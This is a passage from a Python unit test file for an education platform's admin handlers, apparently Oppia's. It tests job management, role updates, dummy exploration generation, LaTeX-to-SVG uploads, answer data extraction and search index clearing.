self.assertEqual(
migration_bot_contributions_model.created_exploration_ids, [])
self.assertEqual(
migration_bot_contributions_model.edited_exploration_ids, [])
def test_regenerate_topic_related_opportunities_action(self):
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
topic_id = 'topic'
story_id = 'story'
self.save_new_valid_exploration(
'0', owner_id, title='title',
end_state_name='End State')
self.publish_exploration(owner_id, '0')
topic = topic_domain.Topic.create_default_topic(
topic_id, 'topic', 'abbrev', 'description')
topic_services.save_new_topic(owner_id, topic)
story = story_domain.Story.create_default_story(
story_id, 'A story', 'Description', topic_id, 'story')
story_services.save_new_story(owner_id, story)
topic_services.add_canonical_story(
owner_id, topic_id, story_id)
story_services.update_story(
owner_id, story_id, [story_domain.StoryChange({
'cmd': 'add_story_node',
'node_id': 'node_1',
'title': 'Node1',
}), story_domain.StoryChange({
'cmd': 'update_story_node_property',
'property_name': 'exploration_id',
'node_id': 'node_1',
'old_value': None,
'new_value': '0'
})], 'Changes.')
all_opportunity_models = list(
opportunity_models.ExplorationOpportunitySummaryModel.get_all())
self.assertEqual(len(all_opportunity_models), 1)
old_creation_time = all_opportunity_models[0].created_on
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
result = self.post_json(
'/adminhandler', {
'action': 'regenerate_topic_related_opportunities',
'topic_id': 'topic'
}, csrf_token=csrf_token)
self.assertEqual(
result, {
'opportunities_count': 1
})
all_opportunity_models = list(
opportunity_models.ExplorationOpportunitySummaryModel.get_all())
self.assertEqual(len(all_opportunity_models), 1)
new_creation_time = all_opportunity_models[0].created_on
self.assertLess(old_creation_time, new_creation_time)
def test_admin_topics_csv_download_handler(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response = self.get_custom_response(
'/admintopicscsvdownloadhandler', 'text/csv')
self.assertEqual(
response.headers['Content-Disposition'],
'attachment; filename=topic_similarities.csv')
self.assertIn(
'Architecture,Art,Biology,Business,Chemistry,Computing,Economics,'
'Education,Engineering,Environment,Geography,Government,Hobbies,'
'Languages,Law,Life Skills,Mathematics,Medicine,Music,Philosophy,'
'Physics,Programming,Psychology,Puzzles,Reading,Religion,Sport,'
'Statistics,Welcome',
response.body)
self.logout()
def test_admin_job_output_handler(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
self.save_new_valid_exploration('exp_id', self.admin_id)
job_id = SampleMapReduceJobManager.create_new()
SampleMapReduceJobManager.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
response = self.get_json('/adminjoboutput', params={'job_id': job_id})
self.assertIsNone(response['output'])
self.process_and_flush_pending_tasks()
response = self.get_json('/adminjoboutput', params={'job_id': job_id})
self.assertEqual(
SampleMapReduceJobManager.get_status_code(job_id),
jobs.STATUS_CODE_COMPLETED)
self.assertEqual(response['output'], ['[u\'sum\', 1]'])
self.logout()
def test_revert_config_property(self):
observed_log_messages = []
def _mock_logging_function(msg, *args):
"""Mocks logging.info()."""
observed_log_messages.append(msg % args)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
config_services.set_property(self.admin_id, 'promo_bar_enabled', True)
self.assertTrue(config_domain.PROMO_BAR_ENABLED.value)
with self.swap(logging, 'info', _mock_logging_function):
self.post_json(
'/adminhandler', {
'action': 'revert_config_property',
'config_property_id': 'promo_bar_enabled'
}, csrf_token=csrf_token)
self.assertFalse(config_domain.PROMO_BAR_ENABLED.value)
self.assertEqual(
observed_log_messages,
['[ADMIN] %s reverted config property: promo_bar_enabled'
% self.admin_id])
self.logout()
def test_start_new_one_off_job(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 0)
with self.swap(
jobs_registry, 'ONE_OFF_JOB_MANAGERS', [SampleMapReduceJobManager]):
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'start_new_job',
'job_type': 'SampleMapReduceJobManager'
}, csrf_token=csrf_token)
self.assertEqual(
self.count_jobs_in_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.logout()
def test_cancel_one_off_job(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
job_id = SampleMapReduceJobManager.create_new()
SampleMapReduceJobManager.enqueue(job_id)
self.run_but_do_not_flush_pending_tasks()
status = SampleMapReduceJobManager.get_status_code(job_id)
self.assertEqual(status, job_models.STATUS_CODE_STARTED)
with self.swap(
jobs_registry, 'ONE_OFF_JOB_MANAGERS', [SampleMapReduceJobManager]):
self.get_json('/adminhandler')
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'cancel_job',
'job_id': job_id,
'job_type': 'SampleMapReduceJobManager'
}, csrf_token=csrf_token)
status = SampleMapReduceJobManager.get_status_code(job_id)
self.assertEqual(status, job_models.STATUS_CODE_CANCELED)
self.logout()
def test_start_computation(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
exploration = exp_domain.Exploration.create_default_exploration(
'exp_id')
exp_services.save_new_exploration('owner_id', exploration)
self.assertEqual(
jobs_test.StartExplorationEventCounter.get_count('exp_id'), 0)
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE)
with self.swap(
jobs_registry, 'ALL_CONTINUOUS_COMPUTATION_MANAGERS',
[jobs_test.StartExplorationEventCounter]):
self.get_json('/adminhandler')
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'start_computation',
'computation_type': 'StartExplorationEventCounter'
}, csrf_token=csrf_token)
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_RUNNING)
self.logout()
def test_stop_computation_with_running_jobs(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
exploration = exp_domain.Exploration.create_default_exploration(
'exp_id')
exp_services.save_new_exploration('owner_id', exploration)
self.assertEqual(
jobs_test.StartExplorationEventCounter.get_count('exp_id'), 0)
jobs_test.StartExplorationEventCounter.start_computation()
self.run_but_do_not_flush_pending_tasks()
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_RUNNING)
with self.swap(
jobs_registry, 'ALL_CONTINUOUS_COMPUTATION_MANAGERS',
[jobs_test.StartExplorationEventCounter]):
self.get_json('/adminhandler')
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'stop_computation',
'computation_type': 'StartExplorationEventCounter'
}, csrf_token=csrf_token)
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE)
self.logout()
def test_stop_computation_with_finished_jobs(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
exploration = exp_domain.Exploration.create_default_exploration(
'exp_id')
exp_services.save_new_exploration('owner_id', exploration)
self.assertEqual(
jobs_test.StartExplorationEventCounter.get_count('exp_id'), 0)
jobs_test.StartExplorationEventCounter.start_computation()
self.process_and_flush_pending_tasks()
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_RUNNING)
with self.swap(
jobs_registry, 'ALL_CONTINUOUS_COMPUTATION_MANAGERS',
[jobs_test.StartExplorationEventCounter]):
self.get_json('/adminhandler')
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'stop_computation',
'computation_type': 'StartExplorationEventCounter'
}, csrf_token=csrf_token)
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE)
self.logout()
def test_stop_computation_with_stopped_jobs(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
exploration = exp_domain.Exploration.create_default_exploration(
'exp_id')
exp_services.save_new_exploration('owner_id', exploration)
self.assertEqual(
jobs_test.StartExplorationEventCounter.get_count('exp_id'), 0)
jobs_test.StartExplorationEventCounter.start_computation()
self.run_but_do_not_flush_pending_tasks()
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_RUNNING)
jobs_test.StartExplorationEventCounter.stop_computation(self.admin_id)
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE)
with self.swap(
jobs_registry, 'ALL_CONTINUOUS_COMPUTATION_MANAGERS',
[jobs_test.StartExplorationEventCounter]):
self.get_json('/adminhandler')
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'stop_computation',
'computation_type': 'StartExplorationEventCounter'
}, csrf_token=csrf_token)
status = jobs_test.StartExplorationEventCounter.get_status_code()
self.assertEqual(
status, job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE)
self.logout()
def test_upload_topic_similarities(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.assertEqual(recommendations_services.get_topic_similarity(
'Art', 'Biology'), 0.1)
self.assertEqual(recommendations_services.get_topic_similarity(
'Art', 'Art'), feconf.SAME_TOPIC_SIMILARITY)
self.assertEqual(recommendations_services.get_topic_similarity(
'Topic 1', 'Topic 2'), feconf.DEFAULT_TOPIC_SIMILARITY)
self.assertEqual(recommendations_services.get_topic_similarity(
'Topic', 'Topic'), feconf.SAME_TOPIC_SIMILARITY)
topic_similarities_data = (
'Art,Biology,Chemistry\n'
'1.0,0.2,0.1\n'
'0.2,1.0,0.8\n'
'0.1,0.8,1.0'
)
self.post_json(
'/adminhandler', {
'action': 'upload_topic_similarities',
'data': topic_similarities_data
}, csrf_token=csrf_token)
self.assertEqual(recommendations_services.get_topic_similarity(
'Art', 'Biology'), 0.2)
self.logout()
class GenerateDummyExplorationsTest(test_utils.GenericTestBase):
"""Test the conditions for generation of dummy explorations."""
def setUp(self):
super(GenerateDummyExplorationsTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
def test_generate_count_greater_than_publish_count(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_explorations',
'num_dummy_exps_to_generate': 10,
'num_dummy_exps_to_publish': 3
}, csrf_token=csrf_token)
generated_exps = exp_services.get_all_exploration_summaries()
published_exps = exp_services.get_recently_published_exp_summaries(5)
self.assertEqual(len(generated_exps), 10)
self.assertEqual(len(published_exps), 3)
def test_generate_count_equal_to_publish_count(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_explorations',
'num_dummy_exps_to_generate': 2,
'num_dummy_exps_to_publish': 2
}, csrf_token=csrf_token)
generated_exps = exp_services.get_all_exploration_summaries()
published_exps = exp_services.get_recently_published_exp_summaries(5)
self.assertEqual(len(generated_exps), 2)
self.assertEqual(len(published_exps), 2)
def test_generate_count_less_than_publish_count(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
generated_exps_response = self.post_json(
'/adminhandler', {
'action': 'generate_dummy_explorations',
'num_dummy_exps_to_generate': 2,
'num_dummy_exps_to_publish': 5
},
csrf_token=csrf_token, expected_status_int=400)
self.assertEqual(generated_exps_response['status_code'], 400)
generated_exps = exp_services.get_all_exploration_summaries()
published_exps = exp_services.get_recently_published_exp_summaries(5)
self.assertEqual(len(generated_exps), 0)
self.assertEqual(len(published_exps), 0)
def test_handler_raises_error_with_non_int_num_dummy_exps_to_generate(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
with self.assertRaisesRegexp(
Exception, 'invalid_type is not a number'):
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_explorations',
'num_dummy_exps_to_publish': 1,
'num_dummy_exps_to_generate': 'invalid_type'
}, csrf_token=csrf_token)
generated_exps = exp_services.get_all_exploration_summaries()
published_exps = exp_services.get_recently_published_exp_summaries(5)
self.assertEqual(generated_exps, {})
self.assertEqual(published_exps, {})
self.logout()
def test_handler_raises_error_with_non_int_num_dummy_exps_to_publish(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
with self.assertRaisesRegexp(
Exception, 'invalid_type is not a number'):
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_explorations',
'num_dummy_exps_to_publish': 'invalid_type',
'num_dummy_exps_to_generate': 1
}, csrf_token=csrf_token)
generated_exps = exp_services.get_all_exploration_summaries()
published_exps = exp_services.get_recently_published_exp_summaries(5)
self.assertEqual(generated_exps, {})
self.assertEqual(published_exps, {})
self.logout()
def test_cannot_generate_dummy_explorations_in_prod_mode(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
prod_mode_swap = self.swap(constants, 'DEV_MODE', False)
assert_raises_regexp_context_manager = self.assertRaisesRegexp(
Exception, 'Cannot generate dummy explorations in production.')
with assert_raises_regexp_context_manager, prod_mode_swap:
self.post_json(
'/adminhandler', {
'action': 'generate_dummy_explorations',
'num_dummy_exps_to_generate': 10,
'num_dummy_exps_to_publish': 3
}, csrf_token=csrf_token)
generated_exps = exp_services.get_all_exploration_summaries()
published_exps = exp_services.get_recently_published_exp_summaries(5)
self.assertEqual(generated_exps, {})
self.assertEqual(published_exps, {})
self.logout()
class AdminRoleHandlerTest(test_utils.GenericTestBase):
"""Checks the user role handling on the admin page."""
def setUp(self):
"""Complete the signup process for self.ADMIN_EMAIL."""
super(AdminRoleHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.set_admins([self.ADMIN_USERNAME])
def test_view_and_update_role(self):
user_email = '[email protected]'
username = 'user1'
self.signup(user_email, username)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
# Check normal user has expected role. Viewing by username.
response_dict = self.get_json(
feconf.ADMIN_ROLE_HANDLER_URL,
params={'filter_criterion': 'username', 'username': 'user1'})
self.assertEqual(
response_dict, {'user1': feconf.ROLE_ID_EXPLORATION_EDITOR})
# Check role correctly gets updated.
csrf_token = self.get_new_csrf_token()
response_dict = self.post_json(
feconf.ADMIN_ROLE_HANDLER_URL,
{'role': feconf.ROLE_ID_MODERATOR, 'username': username},
csrf_token=csrf_token,
expected_status_int=200)
self.assertEqual(response_dict, {})
# Viewing by role.
response_dict = self.get_json(
feconf.ADMIN_ROLE_HANDLER_URL,
params={
'filter_criterion': 'role',
'role': feconf.ROLE_ID_MODERATOR
})
self.assertEqual(response_dict, {'user1': feconf.ROLE_ID_MODERATOR})
self.logout()
def test_invalid_username_in_filter_criterion_and_update_role(self):
username = 'myinvaliduser'
self.login(self.ADMIN_EMAIL, is_super_admin=True)
# Trying to view role of non-existent user.
self.get_json(
feconf.ADMIN_ROLE_HANDLER_URL,
params={'filter_criterion': 'username', 'username': username},
expected_status_int=400)
# Trying to update role of non-existent user.
csrf_token = self.get_new_csrf_token()
self.post_json(
feconf.ADMIN_ROLE_HANDLER_URL,
{'role': feconf.ROLE_ID_MODERATOR, 'username': username},
csrf_token=csrf_token,
expected_status_int=400)
def test_cannot_view_role_with_invalid_view_filter_criterion(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response = self.get_json(
feconf.ADMIN_ROLE_HANDLER_URL,
params={'filter_criterion': 'invalid', 'username': 'user1'},
expected_status_int=400)
self.assertEqual(
response['error'], 'Invalid filter criterion to view roles.')
def test_changing_user_role_from_topic_manager_to_moderator(self):
user_email = '[email protected]'
username = 'user1'
self.signup(user_email, username)
self.set_topic_managers([username])
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response_dict = self.get_json(
feconf.ADMIN_ROLE_HANDLER_URL,
params={'filter_criterion': 'username', 'username': username})
self.assertEqual(
response_dict, {username: feconf.ROLE_ID_TOPIC_MANAGER})
# Check role correctly gets updated.
csrf_token = self.get_new_csrf_token()
response_dict = self.post_json(
feconf.ADMIN_ROLE_HANDLER_URL,
{'role': feconf.ROLE_ID_MODERATOR, 'username': username},
csrf_token=csrf_token)
self.assertEqual(response_dict, {})
response_dict = self.get_json(
feconf.ADMIN_ROLE_HANDLER_URL,
params={'filter_criterion': 'username', 'username': username})
self.assertEqual(response_dict, {username: feconf.ROLE_ID_MODERATOR})
self.logout()
def test_changing_user_role_from_exploration_editor_to_topic_manager(self):
user_email = '[email protected]'
username = 'user1'
self.signup(user_email, username)
user_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
topic_id = topic_services.get_new_topic_id()
self.save_new_topic(
topic_id, user_id, name='Name',
abbreviated_name='abbrev', url_fragment='url-fragment',
description='Description', canonical_story_ids=[],
additional_story_ids=[], uncategorized_skill_ids=[],
subtopics=[], next_subtopic_id=1)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response_dict = self.get_json(
feconf.ADMIN_ROLE_HANDLER_URL,
params={'filter_criterion': 'username', 'username': username})
self.assertEqual(
response_dict, {username: feconf.ROLE_ID_EXPLORATION_EDITOR})
# Check role correctly gets updated.
csrf_token = self.get_new_csrf_token()
response_dict = self.post_json(
feconf.ADMIN_ROLE_HANDLER_URL,
{'role': feconf.ROLE_ID_TOPIC_MANAGER, 'username': username,
'topic_id': topic_id}, csrf_token=csrf_token)
self.assertEqual(response_dict, {})
response_dict = self.get_json(
feconf.ADMIN_ROLE_HANDLER_URL,
params={'filter_criterion': 'username', 'username': username})
self.assertEqual(
response_dict, {username: feconf.ROLE_ID_TOPIC_MANAGER})
self.logout()
class ExplorationsLatexSvgHandlerTest(test_utils.GenericTestBase):
"""Tests for Saving Math SVGs in explorations."""
def setUp(self):
"""Complete the signup process for self.ADMIN_EMAIL."""
super(ExplorationsLatexSvgHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.set_admins([self.ADMIN_USERNAME])
def test_get_latex_to_svg_mapping(self):
user_email = '[email protected]'
username = 'user1'
self.signup(user_email, username)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
multiple_explorations_math_rich_text_info = []
math_rich_text_info1 = (
exp_domain.ExplorationMathRichTextInfo(
'exp_id1', True, ['abc1', 'xyz1']))
multiple_explorations_math_rich_text_info.append(math_rich_text_info1)
math_rich_text_info2 = (
exp_domain.ExplorationMathRichTextInfo(
'exp_id2', True, ['abc2', 'xyz2']))
multiple_explorations_math_rich_text_info.append(math_rich_text_info2)
math_rich_text_info3 = (
exp_domain.ExplorationMathRichTextInfo(
'exp_id3', True, ['abc3', 'xyz3']))
multiple_explorations_math_rich_text_info.append(math_rich_text_info3)
exp_services.save_multi_exploration_math_rich_text_info_model(
multiple_explorations_math_rich_text_info)
response_dict = self.get_json(
feconf.EXPLORATIONS_LATEX_SVG_HANDLER,
params={'item_to_fetch': 'exp_id_to_latex_mapping'})
expected_response = {
'exp_id1': ['abc1', 'xyz1'],
'exp_id2': ['abc2', 'xyz2']
}
self.assertEqual(
response_dict,
{'latex_strings_to_exp_id_mapping': expected_response})
def test_get_when_invalid_item_to_fetch_item_given(self):
user_email = '[email protected]'
username = 'user1'
self.signup(user_email, username)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
response_dict = self.get_json(
feconf.EXPLORATIONS_LATEX_SVG_HANDLER,
params={'item_to_fetch': 'invalid'},
expected_status_int=400)
self.assertIn(
'Please specify a valid type of item to fetch.',
response_dict['error'])
def test_get_number_explorations_left_to_update(self):
user_email = '[email protected]'
username = 'user1'
self.signup(user_email, username)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
multiple_explorations_math_rich_text_info = []
math_rich_text_info1 = (
exp_domain.ExplorationMathRichTextInfo(
'exp_id1', True, ['abc1', 'xyz1']))
multiple_explorations_math_rich_text_info.append(math_rich_text_info1)
math_rich_text_info2 = (
exp_domain.ExplorationMathRichTextInfo(
'exp_id2', True, ['abc2', 'xyz2']))
multiple_explorations_math_rich_text_info.append(math_rich_text_info2)
math_rich_text_info3 = (
exp_domain.ExplorationMathRichTextInfo(
'exp_id3', True, ['abc3', 'xyz3']))
multiple_explorations_math_rich_text_info.append(math_rich_text_info3)
exp_services.save_multi_exploration_math_rich_text_info_model(
multiple_explorations_math_rich_text_info)
response_dict = self.get_json(
feconf.EXPLORATIONS_LATEX_SVG_HANDLER,
params={'item_to_fetch': 'number_of_explorations_left_to_update'})
self.assertEqual(
response_dict,
{'number_of_explorations_left_to_update': '3'})
def test_post_svgs_when_all_values_are_valid(self):
user_email = '[email protected]'
username = 'user1'
self.signup(user_email, username)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
editor_id = self.get_user_id_from_email(user_email)
post_data = {
'exp_id1': {
'+,+,+,+': {
'latexId': 'latex_id1',
'dimensions': {
'encoded_height_string': '1d429',
'encoded_width_string': '1d33',
'encoded_vertical_padding_string': '0d241'
}
},
'\\frac{x}{y}': {
'latexId': 'latex_id2',
'dimensions': {
'encoded_height_string': '1d525',
'encoded_width_string': '3d33',
'encoded_vertical_padding_string': '0d241'
}
}
}
}
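        # Each key under the exploration id is a raw LaTeX string; 'latexId'
        # names the SVG file uploaded alongside the request, and the encoded
        # dimension strings use 'd' as the decimal point (e.g. '1d429' means a
        # height of 1.429ex, matching the uploaded SVG below).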
csrf_token = self.get_new_csrf_token()
svg_file_1 = (
'<svg xmlns="http://www.w3.org/2000/svg" width="1.33ex" height="1.4'
'29ex" viewBox="0 -511.5 572.5 615.4" focusable="false" style="vert'
'ical-align: -0.241ex;"><g stroke="currentColor" fill="currentColo'
'r" stroke-width="0" transform="matrix(1 0 0 -1 0 0)"><path stroke'
'-width="1" d="M52 289Q59 331 106 386T222 442Q257 442 2864Q412 404'
' 406 402Q368 386 350 336Q290 115 290 78Q290 50 306 38T341 26Q37'
'8 26 414 59T463 140Q466 150 469 151T485 153H489Q504 153 504 145284'
' 52 289Z"/></g></svg>'
)
svg_file_2 = (
'<svg xmlns="http://www.w3.org/2000/svg" width="3.33ex" height="1.5'
'25ex" viewBox="0 -511.5 572.5 615.4" focusable="false" style="vert'
'ical-align: -0.241ex;"><g stroke="currentColor" fill="currentColo'
'r" stroke-width="0" transform="matrix(1 0 0 -1 0 0)"><path stroke'
'-width="1" d="M52 289Q59 331 106 386T222 442Q257 442 2864Q412 404'
' 406 402Q368 386 350 336Q290 115 290 78Q290 50 306 38T341 26Q37'
'8 26 414 59T463 140Q466 150 469 151T485 153H489Q504 153 504 145284'
' 52 289Z"/></g></svg>'
)
exploration1 = exp_domain.Exploration.create_default_exploration(
'exp_id1', title='title1', category='category')
exp_services.save_new_exploration(editor_id, exploration1)
exp_models.ExplorationMathRichTextInfoModel(
id='exp_id1',
math_images_generation_required=True,
latex_strings_without_svg=['+,+,+,+', '\\frac{x}{y}'],
estimated_max_size_of_images_in_bytes=20000).put()
response_dict = self.post_json(
feconf.EXPLORATIONS_LATEX_SVG_HANDLER,
{'latexMapping': post_data},
csrf_token=csrf_token,
upload_files=(
('latex_id1', 'latex_id1', svg_file_1),
('latex_id2', 'latex_id2', svg_file_2), ),
expected_status_int=200)
self.assertEqual(
response_dict,
{
'number_of_explorations_updated': '1',
'number_of_explorations_left_to_update': '0'
})
self.logout()
def test_post_svgs_when_some_images_are_not_supplied(self):
user_email = '[email protected]'
username = 'user1'
self.signup(user_email, username)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
editor_id = self.get_user_id_from_email(user_email)
post_data = {
'exp_id1': {
'+,+,+,+': {
'latexId': 'latex_id1',
'dimensions': {
'encoded_height_string': '1d429',
'encoded_width_string': '1d33',
'encoded_vertical_padding_string': '0d241'
}
},
'\\frac{x}{y}': {
'latexId': 'latex_id2',
'dimensions': {
'encoded_height_string': '1d525',
'encoded_width_string': '3d33',
'encoded_vertical_padding_string': '0d241'
}
}
}
}
        # Upload only one of the two required SVGs so that the handler reports
        # the missing one.
csrf_token = self.get_new_csrf_token()
svg_file_1 = (
'<svg xmlns="http://www.w3.org/2000/svg" width="1.33ex" height="1.4'
'29ex" viewBox="0 -511.5 572.5 615.4" focusable="false" style="vert'
'ical-align: -0.241ex;"><g stroke="currentColor" fill="currentColo'
'r" stroke-width="0" transform="matrix(1 0 0 -1 0 0)"><path stroke'
'-width="1" d="M52 289Q59 331 106 386T222 442Q257 442 2864Q412 404'
' 406 402Q368 386 350 336Q290 115 290 78Q290 50 306 38T341 26Q37'
'8 26 414 59T463 140Q466 150 469 151T485 153H489Q504 153 504 145284'
' 52 289Z"/></g></svg>'
)
exploration1 = exp_domain.Exploration.create_default_exploration(
'exp_id1', title='title1', category='category')
exp_services.save_new_exploration(editor_id, exploration1)
response_dict = self.post_json(
feconf.EXPLORATIONS_LATEX_SVG_HANDLER,
{'latexMapping': post_data},
csrf_token=csrf_token,
upload_files=(
('latex_id1', 'latex_id1', svg_file_1),),
expected_status_int=400)
self.assertIn(
'SVG for LaTeX string \\frac{x}{y} in exploration exp_id1 is not '
'supplied.', response_dict['error'])
self.logout()
class DataExtractionQueryHandlerTests(test_utils.GenericTestBase):
"""Tests for data extraction handler."""
EXP_ID = 'exp'
def setUp(self):
"""Complete the signup process for self.ADMIN_EMAIL."""
super(DataExtractionQueryHandlerTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.exploration = self.save_new_valid_exploration(
self.EXP_ID, self.editor_id, end_state_name='End')
stats_services.record_answer(
self.EXP_ID, self.exploration.version,
self.exploration.init_state_name, 'TextInput',
stats_domain.SubmittedAnswer(
'first answer', 'TextInput', 0,
0, exp_domain.EXPLICIT_CLASSIFICATION, {},
'a_session_id_val', 1.0))
stats_services.record_answer(
self.EXP_ID, self.exploration.version,
self.exploration.init_state_name, 'TextInput',
stats_domain.SubmittedAnswer(
'second answer', 'TextInput', 0,
0, exp_domain.EXPLICIT_CLASSIFICATION, {},
'a_session_id_val', 1.0))
def test_data_extraction_handler(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
# Test that it returns all answers when 'num_answers' is 0.
payload = {
'exp_id': self.EXP_ID,
'exp_version': self.exploration.version,
'state_name': self.exploration.init_state_name,
'num_answers': 0
}
response = self.get_json(
'/explorationdataextractionhandler', params=payload)
extracted_answers = response['data']
self.assertEqual(len(extracted_answers), 2)
self.assertEqual(extracted_answers[0]['answer'], 'first answer')
self.assertEqual(extracted_answers[1]['answer'], 'second answer')
# Make sure that it returns only 'num_answers' number of answers.
payload = {
'exp_id': self.EXP_ID,
'exp_version': self.exploration.version,
'state_name': self.exploration.init_state_name,
'num_answers': 1
}
response = self.get_json(
'/explorationdataextractionhandler', params=payload)
extracted_answers = response['data']
self.assertEqual(len(extracted_answers), 1)
self.assertEqual(extracted_answers[0]['answer'], 'first answer')
def test_that_handler_raises_exception(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
payload = {
'exp_id': self.EXP_ID,
'exp_version': self.exploration.version,
'state_name': 'state name',
'num_answers': 0
}
response = self.get_json(
'/explorationdataextractionhandler', params=payload,
expected_status_int=400)
self.assertEqual(
response['error'],
'Exploration \'exp\' does not have \'state name\' state.')
def test_handler_raises_error_with_invalid_exploration_id(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
payload = {
'exp_id': 'invalid_exp_id',
'state_name': 'state name',
'exp_version': 1,
'num_answers': 0
}
response = self.get_json(
'/explorationdataextractionhandler', params=payload,
expected_status_int=400)
self.assertEqual(
response['error'],
'Entity for exploration with id invalid_exp_id and version 1 not '
'found.')
def test_handler_raises_error_with_invalid_exploration_version(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
payload = {
'exp_id': self.EXP_ID,
'state_name': 'state name',
'exp_version': 10,
'num_answers': 0
}
response = self.get_json(
'/explorationdataextractionhandler', params=payload,
expected_status_int=400)
self.assertEqual(
response['error'],
'Entity for exploration with id %s and version 10 not found.'
% self.EXP_ID)
class ClearSearchIndexTest(test_utils.GenericTestBase):
"""Tests that search index gets cleared."""
def test_clear_search_index(self):
exp_services.load_demo('0')
result_explorations = search_services.search_explorations(
'Welcome', 2)[0]
self.assertEqual(result_explorations, ['0'])
collection_services.load_demo('0')
result_collections = search_services.search_collections('Welcome', 2)[0]
self.assertEqual(result_collections, ['0'])
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
generated_exps_response = self.post_json(
'/adminhandler', {
'action': 'clear_search_index'
},
csrf_token=csrf_token)
self.assertEqual(generated_exps_response, {})
result_explorations = search_services.search_explorations(
'Welcome', 2)[0]
self.assertEqual(result_explorations, [])
result_collections = search_services.search_collections('Welcome', 2)[0]
self.assertEqual(result_collections, [])
class SendDummyMailTest(test_utils.GenericTestBase):
""""Tests for sending test mails to admin."""
def setUp(self):
super(SendDummyMailTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
def test_send_dummy_mail(self):
self.login(self.ADMIN_EMAIL, is_super_admin=True)
csrf_token = self.get_new_csrf_token()
with self.swap(feconf, 'CAN_SEND_EMAILS', True):
generated_response = self.post_json(
'/senddummymailtoadminhandler', {},
csrf_token=csrf_token, expected_status_int=200)
self.assertEqual(generated_response, {})
with self.swap(feconf, 'CAN_SEND_EMAILS', False):
